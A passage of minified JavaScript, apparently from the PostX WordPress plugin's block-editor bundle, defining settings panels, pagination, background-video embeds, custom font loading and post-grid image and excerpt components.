e.isTab&&(l={settings:I,style:B}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Taxonomy / Category","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function je(e){return ue([{name:"cat",title:e.title,options:S(e?.include,e?.exclude,L)}])}const Ze=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Button Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Sg)}),Oe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Content","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.J$)}),Re=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Entry Header","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.RP)}),De=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Content","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.ff)}),ze=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Dot","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.si)});function Fe(e){return ue([{name:"dot",title:e.title,options:S(e?.include,e?.exclude,p.si)}])}const We=e=>{const t=S(e.include,e.exclude,U);let l=null;return e.isTab&&(l={settings:M,style:A}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Read More","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ve(e){return ue([{name:"read-more",title:e.title,options:S(e?.include,e?.exclude,U)}])}const Ge=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Count Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.U8)}),qe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Zv)}),$e=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Custom CSS","ultimate-post"),store:e.store,data:S(e.include,e.exclude,le)}),Ke=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Responsive","ultimate-post"),store:e.store,pro:e.pro,data:S(e.include,e.exclude,oe)}),Je=e=>(0,o.createElement)(i.Z,{initialOpen:e.initialOpen||!1,store:e.store,title:"inline"==e.title?"":__("Taxonomy Query","ultimate-post"),data:S(e.include,e.exclude,ne)}),Ye=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Wrap Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.qS)}),Xe=e=>{const t=(e.data||re).map((t=>{let l=!1;if(e.dep&&e.dep.includes(t.key))return{...t,label:(0,o.createElement)(c,null,t.label,(0,o.createElement)("span",{className:"ultp-label-tag-dep",title:"This feature is deprecated may be removed in the future updates. Please use the better alternatives."},"Deprecated"))};let a=(0,o.createElement)(c,null);return!ultp_data.active&&e.pro&&e.pro.includes(t.key)&&(!0,a=(0,o.createElement)("span",{className:"ultp-label-tag-pro",title:"Pro Feature"},(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},"Pro"))),e.new&&e.new.includes(t.key)&&(a=(0,o.createElement)(c,null,a,(0,o.createElement)("span",{className:"ultp-label-tag-new",title:"Newly Added Feature"},"New"))),{...t,label:(0,o.createElement)(c,null,t.label,a)}}));return(0,o.createElement)(g,{className:"ultp-toolbar-tab",tabs:[{name:"features",title:e.label}]},(l=>(0,o.createElement)(i.Z,{isToolbar:!0,initialOpen:!1,title:"inline",store:e.store,data:S(e.include,e.exclude,t)})))},Qe=e=>(0,o.createElement)(i.Z,{doc:e.doc,pro:e.pro,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:e.title||__("Common","ultimate-post"),store:e.store,data:S(e.include,e.exclude,[])}),et=e=>(0,o.createElement)(i.Z,{title:"inline",isToolbar:!0,store:e.store,data:S(e.include,e.exclude,[])}),tt=e=>(0,o.createElement)(i.Z,{isToolbar:!0,doc:e.doc,depend:e.depend,youtube:e.youtube,title:"inline",store:e.store,data:S(e.include,e.exclude,[])});function lt(e){return(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,store:e.store,data:[{type:"typography_toolbar",key:e.attrKey,label:e.label}]})}function ot(e){return(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,store:e.store,data:[{type:"toolbar_dropdown",label:e.label,options:e.options,key:e.attrKey}]})}const at=(e={})=>Object.assign({},{arrows:!0,dots:!0,infinite:!0,speed:500,slidesToShow:!0,slidesToScroll:1,autoplay:!0,autoplaySpeed:3e3,cssEase:"linear",lazyLoad:!0},e),it=e=>"default_date"==e?ultp_data.date_format:"default_date_time"==e?ultp_data.date_format+" "+ultp_data.time_format:e,nt=()=>(0,o.createElement)("div",{className:"ultp-next-prev-wrap ultp-disable-editor-click"},(0,o.createElement)("ul",null,(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action ultp-disable",href:"#"},s.ZP.leftAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Previous","ultimate-post")))),(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action",href:"#"},s.ZP.rightAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Next","ultimate-post")))))),rt=(e,t,l="",a=4)=>{const i=l.split("|"),n=i[0]||__("Previous","ultimate-post"),r=i[1]||__("Next","ultimate-post");return(0,o.createElement)("div",{className:"ultp-pagination-wrap ultp-disable-editor-click"+(t?" ultp-pagination-ajax-action":"")},(0,o.createElement)("ul",{className:"ultp-pagination"},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-prev-page-numbers"},s.ZP.leftAngle2,"textArrow"==e?" "+n:"")),a>4&&(0,o.createElement)("li",{className:"ultp-first-dot"},(0,o.createElement)("a",{href:"#"},"...")),new Array(a>2?3:a).fill(0).map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("a",{href:"#"},t+1)))),a>4&&(0,o.createElement)("li",{className:"ultp-last-dot"},(0,o.createElement)("a",{href:"#"},"...")),a>5&&(0,o.createElement)("li",{className:"ultp-last-pages"},(0,o.createElement)("a",{href:"#"},a)),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-next-page-numbers"},"textArrow"==e?r+" ":"",s.ZP.rightAngle2))))},st=e=>(0,o.createElement)("div",{className:"ultp-loadmore"},(0,o.createElement)("a",{className:"ultp-loadmore-action ultp-disable-editor-click"},e)),pt=(e,t)=>{let l=!1;const o=["filterShow","filterType","filterValue","queryUnique","queryNumPosts","queryNumber","metaKey","queryType","queryTax","queryTaxValue","queryRelation","queryOrderBy","queryOrder","queryExclude","queryOffset","queryQuick","taxType","taxSlug","taxValue","queryAuthor","queryCustomPosts","queryPosts","queryExcludeTerm","queryExcludeAuthor","querySticky","taxonomy","fallbackImg","maxTaxonomy","queryPostType"];for(let a=0;a<o.length;a++)if(e[o[a]]!=t[o[a]]){l=!0;break}return l},ct=e=>{const{filterShow:t,filterType:l,filterValue:o,queryNumPosts:a,queryNumber:i,queryType:n,queryTax:r,queryTaxValue:s,queryOrderBy:p,queryOrder:c,queryInclude:u,queryExclude:d,queryOffset:m,metaKey:g,queryQuick:y,queryAuthor:b,queryRelation:v,querySticky:h,queryPosts:f,queryCustomPosts:k,queryExcludeTerm:w,queryExcludeAuthor:x,queryUnique:T,taxonomy:_,fallbackImg:C,maxTaxonomy:E,queryPostType:S}=e;let P=i;if(void 0!==a&&void 0!==i){const e=wp.data.select("core/editor")?.getDeviceType?.()||wp.data.select(wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post")?.__experimentalGetPreviewDeviceType(),t=null!=e?e:"Desktop";JSON.stringify({lg:parseInt(a.lg||""),sm:parseInt(a.sm||""),xs:parseInt(a.xs||"")})!=JSON.stringify({lg:parseInt(i),sm:parseInt(i),xs:parseInt(i)})&&("Desktop"==t?P=a.lg:"Tablet"==t?P=a.sm||a.lg:"Mobile"==t&&(P=a.xs||a.lg))}return{filterShow:t,filterType:l,filterValue:o,queryNumber:P,queryType:n,queryTax:r,queryTaxValue:s,queryOrderBy:p,queryOrder:c,queryInclude:u,queryExclude:d,queryOffset:m,metaKey:g,queryQuick:y,queryAuthor:b,queryRelation:v,querySticky:h,queryPosts:f,queryCustomPosts:k,queryExcludeTerm:w,queryExcludeAuthor:x,queryUnique:T,taxonomy:_,fallbackImg:C,maxTaxonomy:E,queryPostType:S,wpnonce:ultp_data.security}},ut=[{position:1,data:{type:"select",key:"titleAnimation",label:__("Content Animation","ultimate-post"),options:[{value:"",label:"- None -"},{value:"slideup",label:__("Slide Up","ultimate-post"),pro:!0},{value:"slidedown",label:__("Slide Down","ultimate-post"),pro:!0}]}}],dt=(e,t)=>{const l="style2"==t?"ol":"ul";if(e)return(e="string"==typeof e?JSON.parse(e):e).length>0&&(0,o.createElement)(l,{className:"ultp-toc-lists"},e.map(((e,l)=>(0,o.createElement)("li",{key:l},(0,o.createElement)("a",{href:`#${e.link}`},e.content),e.child&&dt(e.child,t)))))},mt=(e="",t=!0,l=0,a=0,i="")=>{if(e){let n="";if(e.includes("youtu")){const o=/youtu(?:.*\/v\/|.*v\=|\.be\/)([A-Za-z0-9_\-]{11})/gm.exec(e);o&&o[1]&&(n="//www.youtube.com/embed/"+o[1]+"?playlist="+o[1]+"&iv_load_policy=3&controls=0&autoplay=1&disablekb=1&rel=0&enablejsapi=1&showinfo=0&wmode=transparent&widgetid=1&playsinline=1&mute=1",n+="&loop="+(t?1:0),n+=l?"&start="+l:"",n+=a?"&end="+a:"")}else{if(!e.includes("vimeo"))return(0,o.createElement)("div",{className:"ultp-rowbg-video"},(0,o.createElement)("video",{className:"ultp-bgvideo",poster:i&&i,muted:!0,loop:!0,autoPlay:!0},(0,o.createElement)("source",{src:e})));{const l=e.match(/(?:www\.|player\.)?vimeo.com\/(?:channels\/(?:\w+\/)?|groups\/(?:[^\/]*)\/videos\/|album\/(?:\d+)\/video\/|video\/|)(\d+)(?:[a-zA-Z0-9_\-]+)?/i);l[1]&&(n="//player.vimeo.com/video/"+l[1]+"?autoplay=1&title=0&byline=0&portrait=0&transparent=0&background=1",n+="&loop="+(t?1:0))}}return n?(0,o.createElement)("div",{className:"ultp-rowbg-video"},(0,o.createElement)("iframe",{src:n,frameBorder:"0",allowFullScreen:!0})):i?(0,o.createElement)("img",{src:i,alt:"Video Fallback Image"}):""}return i?(0,o.createElement)("img",{src:i,alt:"Video Fallback Image"}):""},gt=e=>{const t=wp.data.select("core/block-editor").getBlocks(e);t.length>0&&t.forEach(((e,t)=>{m("core/block-editor").updateBlockAttributes(e.clientId,{updateChild:!e.attributes.updateChild})}))},yt=()=>{const e=window.document.getElementsByName("editor-canvas");return e[0]?.contentDocument?e[0]?.contentDocument:window.document},bt=(e="",t=!1)=>{if("true"!=ultp_data.settings?.ultp_custom_font)return[];const l=ultp_data.custom_fonts,o=[];let a="";return l?.forEach((t=>{const l=[];t.font.forEach((o=>{const i=[];l.push(o.weight),e.includes(t.title)&&(o.woff&&i.push(`url(${o.woff}) format('woff')`),o.woff2&&i.push(`url(${o.woff2}) format('woff2')`),o.ttf&&i.push(`url(${o.ttf}) format('TrueType')`),o.svg&&i.push(`url(${o.svg}) format('svg')`),o.eot&&i.push(`url(${o.eot}) format('eot')`),a+=` @font-face {\n                    font-family: "${t.title}";\n                    font-weight: ${o.weight};\n                    font-display: auto;\n                    src: ${i.join(", ")};\n                } `)})),o.push({n:t.title,v:l,f:""})})),t?a+e:o||[]},vt=()=>{const e=window.location.href;return void 0!==e&&-1!==e.indexOf("path=%2Fpatterns")&&e.indexOf("site-editor.php")>-1},ht=(e,t,l,o)=>{const a=(t,o)=>{t&&t!=l&&("wp_block"===o||e({currentPostId:t?.toString()}))},i=wp.data.select("core/editor")?.getCurrentPostId(),n=wp.data.select("core/edit-site"),r=n?.getEditedPostType()||"";if(t?.hasOwnProperty("ref"))a(t.ref,"wp_block");else if(document.querySelector(".widgets-php"))a("ultp-widget","widget");else if("wp_template_part"==r||"wp_template"==r){const e=(new Date).getTime();setTimeout((()=>{const e=wp.data.select("core")?.getEntityRecords("postType","wp_template",{per_page:-1})||[],t=wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1})||[],l=(()=>{let e={};const t=yt()?.querySelectorAll("*[data-type='core/template-part']");return t?.forEach((t=>{const l=t.querySelectorAll(".wp-block"),o=t.dataset.block,a=[];l?.forEach((e=>{e?.dataset?.type?.includes("ultimate-post/")&&e?.dataset?.block&&a.push(e.dataset.block)})),a.length&&(e={...e,hasItems:"yes",[o]:a})})),e})();let s="";if(l.hasItems&&(s=Object.keys(l).find((e=>l[e]?.includes(o)))),s){const e=wp.data.select("core/block-editor").getBlockAttributes(s),l=t.find((t=>t.id.includes("//"+e?.slug)));a(l?.wp_id,"fse-part")}else if("string"==typeof i&&i.includes("//")){const l=n?.getEditedPostId(),o=("wp_template"==r?e:t).find((e=>e.id==l));a(o?.wp_id,"wp_template"==r?"fse-template":"fse-part")}else a(i,"__editorPostId_fse")}),_&&(e-_)/1e3>=4?0:1500)}else i&&a(i,"__editorPostId")},ft=()=>ultp_data.active?(0,o.createElement)("div",{className:"ultp-editor-support"},(0,o.createElement)("div",{className:"ultp-editor-support-content"},(0,o.createElement)("img",{alt:"site logo",className:"logo",src:ultp_data.url+"assets/img/logo-option.svg"}),(0,o.createElement)("div",{className:"descp"},__("Need quick Human Support?","ultimate-post")),(0,o.createElement)("a",{href:"https://www.wpxpo.com/contact?utm_source=db-postx-editor&utm_medium=blocks-support&utm_campaign=postx-dashboard",target:"_blank",rel:"noreferrer"},__("Get Support","ultimate-post")))):(0,o.createElement)("div",{className:"ultp-editor-support"},(0,o.createElement)("div",{className:"ultp-editor-support-content"},(0,o.createElement)("div",{className:"title"},__("Upgrade to PostX Pro","ultimate-post")),(0,o.createElement)("div",{className:"descp"},__("Unlock all features, blocks, templates, and customization options at a single price.","ultimate-post")),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=blocks-upgrade&utm_campaign=postx-dashboard#pricing",target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post")))),kt=({tag:e,children:t,...l})=>{const a=e;return(0,o.createElement)(a,l,t)},wt=["angle_bottom_left_line","angle_bottom_right_line","angle_top_left_line","angle_top_right_line","leftAngle","rightAngle","leftAngle2","rightAngle2","collapse_bottom_line","arrowUp2","longArrowUp2","arrow_left_circle_line","arrow_bottom_circle_line","arrow_right_circle_line","arrow_top_circle_line","arrow_down_line","leftArrowLg","rightArrowLg","arrow_up_line","down_solid","right_solid","left_solid","up_solid","bottom_right_line","bottom_left_line","top_left_angle_line","top_right_line"]},38156:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{Panel:a,PanelBody:i}=wp.components;function n({children:e,open:t}){return(0,o.createElement)(a,{className:"ultp-depr-panel"},(0,o.createElement)(i,{title:"Depreciated Settings",initialOpen:t},e))}},13448:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049);const{Dropdown:i,ToolbarButton:n}=wp.components;function r({store:e,include:t,buttonContent:l,label:r}){return(0,o.createElement)(i,{contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(n,{onClick:()=>e(),label:r},(0,o.createElement)("span",{className:"ultp-click-toolbar-settings"},l))),renderContent:()=>(0,o.createElement)(a.B3,{store:e,include:t})})}},80118:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{ToolbarDropdownMenu:a}=wp.components,i={className:"ultp-toolbar-dropdown"};function n({options:e,value:t,onChange:l,label:n}){return(0,o.createElement)(a,{popoverProps:i,icon:e.find((e=>e.value===t))?.icon||(0,o.createElement)(o.Fragment,null,"value"),label:n,controls:e.map((e=>({icon:e.icon,title:e.title,isActive:e.value===t,onClick(){l(e.value)},role:"menuitemradio"})))})}},32258:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(53049),i=l(83100);l(74424);const{__}=wp.i18n,{BlockControls:n}=wp.blockEditor,{ToolbarGroup:r}=wp.components,{useSelect:s}=wp.data;function p({children:e,text:t,pro:l=!1,textScroll:p=!1}){const c=s((e=>e("core/preferences").get("core","fixedToolbar"))),u=l&&!ultp_data.active;return(0,o.createElement)(n,null,(0,o.createElement)("div",{className:"ultp-toolbar-group ultp-toolbar-group-bg"},t&&!c&&(0,o.createElement)("div",{className:`ultp-toolbar-group-text${c?"-bottom":""} ${p?"ultp-toolbar-text-ticker-wrapper":""}`},(0,o.createElement)("div",{className:"ultp-toolbar-group-text-inner"},__(t,"ultimate-post")+(u?" (Pro)":""))),u?(0,o.createElement)("div",{className:"ultp-toolbar-group-block"},(0,o.createElement)("div",{className:"ultp-toolbar-group-block-overlay"},(0,o.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Unlock It","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-toolbar-group-block-placeholder"},a.tj,a.gA,a.YG,a.Cz,a.HU)):(0,o.createElement)(r,null,e)))}},23890:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({post:e,catShow:t,catStyle:l,catPosition:a,customCatColor:i,onlyCatColor:n,onClick:r}){return e.category&&t?(0,o.createElement)("div",{className:`ultp-category-grid ultp-category-${l} ultp-category-${a}`},(0,o.createElement)("div",{className:`ultp-category-in ultp-cat-color-${i}`},e.category.map(((e,t)=>i?n?(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-component-simple`,style:{color:e.color||"#CE2746"},onClick:e=>{e.stopPropagation(),r()}},e.name):(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-cat-only-color-${i} ultp-component-simple`,style:{backgroundColor:e.color||"#CE2746"},onClick:e=>{e.stopPropagation(),r()}},e.name):(0,o.createElement)("a",{key:t,className:`ultp-cat-${e.slug} ultp-component-simple`,onClick:e=>{e.stopPropagation(),r()}},e.name))))):null}},49491:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({excerpt:e,excerpt_full:t,seo_meta:l,excerptLimit:a,showFullExcerpt:i,showSeoMeta:n,onClick:r}){return(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),r()},className:"ultp-block-excerpt ultp-component-simple",dangerouslySetInnerHTML:{__html:n?l.split(" ").splice(0,a).join(" "):i?t:e.split(" ").splice(0,a).join(" ")+"..."}})}},74904:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({filterText:e,filterType:t,filterValue:l,onClick:a}){return l=l.length>2?l:"[]",(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),a()},className:"ultp-filter-wrap ultp-disable-editor-click ultp-component","data-taxtype":t},(0,o.createElement)("ul",{className:"ultp-flex-menu"},e&&(0,o.createElement)("li",{className:"filter-item ultp-component-hover"},(0,o.createElement)("a",{className:"filter-active",href:"#"},e)),JSON.parse(l).map(((e,t)=>(e=e.value?e.value:e,(0,o.createElement)("li",{key:t,className:"filter-item ultp-component-hover"},(0,o.createElement)("a",{href:"#"},e.replace(/-/g," "))))))))}},53105:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r,m:()=>s});var o=l(67294),a=l(25335),i=l(74904),n=l(71411);function r({attributes:e,setAttributes:t,onClick:l,setSection:r,setToolbarSettings:s}){const{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v,filterShow:h,paginationShow:f,queryType:k,filterText:w,filterType:x,filterValue:T,paginationType:_,navPosition:C}=e;return(0,o.createElement)("div",{className:"ultp-heading-filter",onClick:e=>{e.stopPropagation(),l()}},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(a.Z,{props:{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,setAttributes:t,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v}}),(h||f)&&(0,o.createElement)("div",{className:"ultp-filter-navigation"},h&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)(i.Z,{filterText:w,filterType:x,filterValue:T,onClick:()=>{r("filter"),s("filter")}}),f&&"navigation"==_&&"topRight"==C&&(0,o.createElement)(n.Z,{onClick:()=>{r("pagination"),s("pagination")}}))))}function s({attributes:e,setAttributes:t,onClick:l,setSection:r,setToolbarSettings:s}){const{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v,filterShow:h,paginationShow:f,queryType:k,filterText:w,filterType:x,filterValue:T,paginationType:_,navPosition:C}=e;return(0,o.createElement)("div",{className:"ultp-heading-filter",onClick:e=>{e.stopPropagation(),l()}},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(a.Z,{props:{headingShow:p,headingStyle:c,headingAlign:u,headingURL:d,headingText:m,setAttributes:t,headingBtnText:g,subHeadingShow:y,subHeadingText:b,headingTag:v}}),(h||f)&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)("div",{className:"ultp-filter-navigation"},h&&"posts"!=k&&"customPosts"!=k&&(0,o.createElement)(i.Z,{filterText:w,filterType:x,filterValue:T,onClick:()=>{r("filter"),s("filter")}}),f&&"navigation"==_&&"topRight"==C&&(0,o.createElement)(n.Z,{onClick:()=>{r("pagination"),s("pagination")}}))))}},29236:(e,t,l)=>{"use strict";l.d(t,{A8:()=>u,E_:()=>p,En:()=>g,MV:()=>m,UU:()=>k,ZP:()=>r,_g:()=>y,kS:()=>h,nk:()=>s,qI:()=>b,w4:()=>d,xj:()=>f,y6:()=>v,zk:()=>c});var o=l(67294),a=l(64766),i=l(88640);const n=({onClick:e})=>{const{showStyleButton:t,StyleButton:l}=(0,i.Z)(e);return(0,o.createElement)("div",{className:"ultp-block-image ultp-block-empty-image",onClick:t},l)};function r({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,imgSize:n,fallbackEnable:r,vidIconEnable:p,idx:c,catPosition:u,Category:d,onClick:m,vidOnClick:g}){const{showStyleButton:y,StyleButton:b}=(0,i.Z)((e=>{e.stopPropagation(),m()}));return(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+c:""} ultp-component-simple`,onClick:y},b,(0,o.createElement)("a",{className:"ultp-component-hover"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[n]:p&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),p&&a.has_video&&(0,o.createElement)(s,{onClick:g}),d)}function s({onClick:e}){return(0,o.createElement)("div",{onClick:t=>{t.stopPropagation(),e()},className:"ultp-video-icon"},a.ZP.play_line)}function p({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,Category:c,showImage:u,imgCrop:d,onClick:m}){const g=e=>{e.stopPropagation(),m()},{showStyleButton:y,StyleButton:b}=(0,i.Z)(g);return(a.image&&!a.is_fallback||r)&&u?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ":""}`,onClick:y},b,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[d]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),c):(0,o.createElement)(n,{onClick:g})}function c({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,imgCropSmall:c,showImage:u,imgCrop:d,idx:m,showSmallCat:g,Category:y,onClick:b}){const v=e=>{e.stopPropagation(),b()},{showStyleButton:h,StyleButton:f}=(0,i.Z)(v);return(a.image&&!a.is_fallback||r)&&u?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ":""}`,onClick:h},f,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==m?d:c]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),y):(0,o.createElement)(n,{onClick:v})}function u({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,imgCropSmall:p,showImage:c,imgCrop:u,idx:d,Category:m,Video:g=null,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+d:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==d?u:p]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g,m):(0,o.createElement)(n,{onClick:b})}function d({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,Category:g,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g):(0,o.createElement)(n,{onClick:b})}function m({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,Category:g,onClick:y}){const b=e=>{e.stopPropagation(),y()},{showStyleButton:v,StyleButton:h}=(0,i.Z)(b);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-ux-style-btn-parent ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:v},h,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g):(0,o.createElement)(n,{onClick:b})}function g({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,catPosition:p,showImage:c,idx:u,showSmallCat:d,imgSize:m,layout:g,Category:y,onClick:b}){const v=e=>{e.stopPropagation(),b()},{showStyleButton:h,StyleButton:f}=(0,i.Z)(v);return(a.image&&!a.is_fallback||r)&&c?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+u:""}`,onClick:h},f,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[m]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),y):(0,o.createElement)(n,{onClick:v})}function y({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:r,vidIconEnable:s,showImage:p,idx:c,imgCrop:u,Category:d=null,Video:m=null,onClick:g}){const y=e=>{e.stopPropagation(),g()},{showStyleButton:b,StyleButton:v}=(0,i.Z)(y);return(a.image&&!a.is_fallback||r)&&p?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+c:""}`,onClick:b},v,(0,o.createElement)("a",null,(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[u]:s&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":r&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),m,d):(0,o.createElement)(n,{onClick:y})}function 